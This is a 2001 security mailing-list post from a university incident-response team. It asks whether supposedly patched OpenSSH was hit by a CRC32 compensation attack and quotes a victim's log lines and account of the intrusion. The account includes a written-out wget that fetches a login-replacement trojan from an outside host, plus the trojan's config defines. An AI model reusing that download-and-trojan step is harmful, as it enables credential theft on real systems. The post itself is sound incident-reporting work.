Attacks against SSH?

[johan.augustsson () adm gu se]

I stumbeled over this post at openssh-unix-dev mailinglist last week -
http://marc.theaimsgroup.com/?l=openssh-unix-dev&m=100701808712180&w=2
The poster claims that he had OpenSSH-2.9p2-8.7 (latest uppdate for
RedHat 7.0) up and running when he received what looks to be a
CRC32-attack. A few minutes later you can see (he posted parts of the
logfile) a new user being created with uid=0 and then how an connection
is made from system in Israel.

There has been no confirmation about what he writes but I recieved the
following mail as an answer of my questions.

------ Message ------
I posted an openssh security alert earlier today and already got some
responses.
Thanks for everything.

Instead of replying to everyone individually I composed the details of
the
attack.

+++

It does not look like a job of worms.
Snort did not detect mass port scan from attacker's ip address. It seems
that he (I assumed, so I don't have to type he/she all the way) just
wants
to gain access through openssh.

The server is running Red Hat 7.0. With all packages up to date. The
following daemons are running:  wu-ftpd, apache, telnet, openssh, named
I never access the system via telnet, it is there just for backup
purpose.

> > Nov 25 11:37:40 ns sshd[10994]: Disconnecting: crc32 compensation
attack:
> > network attack detected
> > Nov 25 11:37:48 ns sshd[11006]: Disconnecting: Corrupted check bytes on
> > input.
> > Nov 25 11:37:53 ns sshd[11013]: Disconnecting: Corrupted check bytes on
> > input.
> > Nov 25 11:37:54 ns sshd[11014]: Disconnecting: Corrupted check bytes on
> > input.
> > Nov 25 11:40:00 ns CROND[11022]: (root) CMD (   /sbin/rmmod -as)
> > Nov 25 11:40:08 ns adduser[11023]: new group: name=mattanl, gid=528
> > Nov 25 11:40:08 ns adduser[11023]: new user: name=mattanl, uid=528,
gid=528,
> > home=/home/mattanl, shell=/bin/bash
> > Nov 25 11:40:27 ns adduser[11027]: new group: name=mattan, gid=529
> > Nov 25 11:40:27 ns adduser[11027]: new user: name=mattan, uid=0,
gid=529,
> > home=/home/mattan, shell=/bin/bash

After the attacker gained root access. He created two users mattan and
mattanl.
He then downloaded a package: wget
http://home.dal.net/resolve/login.tgz.
The target site has been compromised. (hacked by a hacker group in
Israel)
This is a login replacement package, it logs the user id and passwords.
He
modified rk.h to:
#define MY_LOGFILE "/dev/ttypz"
#define MY_PASSWORD "1245890"
After he complied and installed the login replacement. Something went
wrong.
/bin/login was zero bytes in length. So when he came back using telnet,
he
was denied of access. I also disabled sshd and kept one session open for
remote control after found login was replaced. I md5 checked the system
against a good backup, nothing else was altered.

I will try to sniff all packets come to my this server on ssh port. If
he
attempts to crack the server again, I will have more details. But I
guess I
will have to turn the server back on.

Thanks for all you time
------ End of message ------

I had some further questions so I mailed the guy once again but has not
recieved any answer.

So, to he main question.
Has anyone else had a system compromised by the CRC32-attack when
running a version of sshd that is believed to be secure? OpenSSH-2.3.0
or later, SSH 1.2.32 or later.



/Johan Augustsson

--------------------------------------------------------------------
Johan Augustsson                 Phone: +46 (0)31 773 1000
Incident Response Team           Fax: +46 (0)31 773 1087
Göteborg University              E-mail: Johan.Augustsson () adm gu se
Sweden
--------------------------------------------------------------------

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com